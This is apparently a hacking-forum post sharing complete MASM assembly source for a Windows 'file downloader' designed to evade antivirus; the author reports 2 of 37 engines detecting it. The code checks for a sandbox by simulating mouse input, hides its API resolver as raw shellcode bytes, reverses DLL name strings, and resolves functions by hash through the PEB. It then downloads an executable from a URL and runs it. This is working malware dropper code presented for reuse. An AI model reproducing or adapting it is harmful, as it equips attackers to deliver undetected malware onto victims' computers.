13 Years of Service
77%
Just my implementation of a file downloader. I had a little go at bypassing Anti-Viruses but I believe that shouldn't be the main thing people want etc. I share most of my source codes so that people can learn, not so they can get FUD shit etc. I got the StrReverse procedure out of the MASM macro's lib that comes with MASM just in case someone doesn't have these files. The rest is fully written by me. At the moment it compiles to 2,560 bytes could get this smaller but would have to mess with the section alignment etc.
But since I know at least one of you will ask what the detection rate is it's currently (2/37)
by DeadlyVermilion
Code:
>.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib
LASTINPUTINFO struct
cbSize DWORD ?
dwTime DWORD ?
LASTINPUTINFO ends
.data
szLoadAPI db 055h, 08Bh, 0ECh, 083h, 0C4h, 0F4h, 052h, 089h, 055h, 0FCh, 08Bh, 04Ah, 03Ch, 003h, 0CAh, 089h, 04Dh, 0F4h, 08Bh, 049h
db 078h, 003h, 0CAh, 089h, 04Dh, 0F8h, 08Bh, 051h, 018h, 08Bh, 049h, 020h, 003h, 04Dh, 0FCh, 033h, 0FFh, 08Bh, 031h, 003h
db 075h, 0FCh, 033h, 0C0h, 051h, 0ACh, 08Bh, 0C8h, 003h, 0F8h, 0D3h, 0C7h, 085h, 0C0h, 075h, 0F5h, 059h, 03Bh, 0FBh, 074h
db 010h, 083h, 0C1h, 004h, 04Ah, 075h, 0E0h, 0BAh, 0C2h, 058h, 062h, 01Bh, 05Ah, 033h, 0C0h, 0C9h, 0C3h, 08Bh, 045h, 0FCh
db 08Bh, 04Dh, 0F8h, 08Bh, 059h, 018h, 08Bh, 049h, 024h, 003h, 0C8h, 02Bh, 0DAh, 0D1h, 0E3h, 003h, 0CBh, 00Fh, 0B7h, 019h
db 08Bh, 04Dh, 0F8h, 08Bh, 049h, 01Ch, 003h, 0C8h, 0C1h, 0E3h, 002h, 003h, 0CBh, 003h, 001h, 05Ah, 0C9h, 0C3h
szURL db 'http://example.com/file.exe', 0
szFileName db 'deadlyvermilion.exe', 0
szURLMon db 'lld.noMLRU', 0
szShell32 db 'lld.23llehS', 0
dwLoadAPI DWORD ?
dwLoadLibraryA DWORD ?
dwURLMon DWORD ?
dwShell32 DWORD ?
dwURLDownloadToFileA DWORD ?
dwShellExecuteA DWORD ?
FirstInput LASTINPUTINFO <>
SecondInput LASTINPUTINFO <>
.code
StrReverse proc lpString:LPSTR
mov eax,lpString ; put string address in EAX
mov edx,eax ; same in EDX
@@: ; move EDX to the end of string
add edx,1
cmp byte ptr [edx],0
jne @B
sub edx,1 ; return EDX to last not null character
@@:
mov cl,byte ptr [eax] ; swap EAX and EDX, moving from two brinks
mov ch,byte ptr [edx] ; in opposite directions
mov [eax],ch ; while EAX is less than EDX
mov [edx],cl
add eax,1
sub edx,1
cmp eax,edx
jl @B
ret
StrReverse endp
;********************************************************************************
start:
MOV FirstInput.cbSize, SizeOf LASTINPUTINFO
MOV SecondInput.cbSize, SizeOf LASTINPUTINFO
Invoke GetLastInputInfo, ADDR FirstInput
Invoke Sleep, 5000
Invoke mouse_event, MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
Invoke mouse_event, MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
Invoke GetLastInputInfo, ADDR SecondInput
MOV EAX, SecondInput.dwTime
SUB EAX, FirstInput.dwTime
CMP EAX, 4500
JL ExitMain
Invoke VirtualProtect, ADDR szLoadAPI, 118, PAGE_EXECUTE_READWRITE, 0
Invoke StrReverse, ADDR szURLMon
Invoke StrReverse, ADDR szShell32
LEA EAX, szLoadAPI
MOV dwLoadAPI, EAX
ASSUME FS:NOTHING
MOV EAX, FS:[30h]
MOV EAX, [EAX+0Ch]
MOV EAX, [EAX+0Ch]
MOV EAX, [EAX]
MOV EAX, [EAX]
MOV EAX, [EAX+18h]
MOV EDX, EAX
MOV EBX, 0A216A185h
CALL dwLoadAPI
MOV dwLoadLibraryA, EAX
PUSH OFFSET szURLMon
CALL EAX
MOV dwURLMon, EAX
PUSH OFFSET szShell32
CALL dwLoadLibraryA
MOV dwShell32, EAX
MOV EDX, dwURLMon
MOV EBX, 0B2040657h
CALL dwLoadAPI
MOV dwURLDownloadToFileA, EAX
MOV EDX, dwShell32
MOV EBX, 0D9A88A30h
CALL dwLoadAPI
MOV dwShellExecuteA, EAX
PUSH 0
PUSH 0
PUSH OFFSET szFileName
PUSH OFFSET szURL
PUSH 0
CALL dwURLDownloadToFileA
PUSH 0
PUSH 0
PUSH 0
PUSH OFFSET szFileName
PUSH 0
PUSH 0
CALL dwShellExecuteA
ExitMain:
RET
end start
This link is hidden for visitors. Please Log in or register now.
by DeadlyVermilion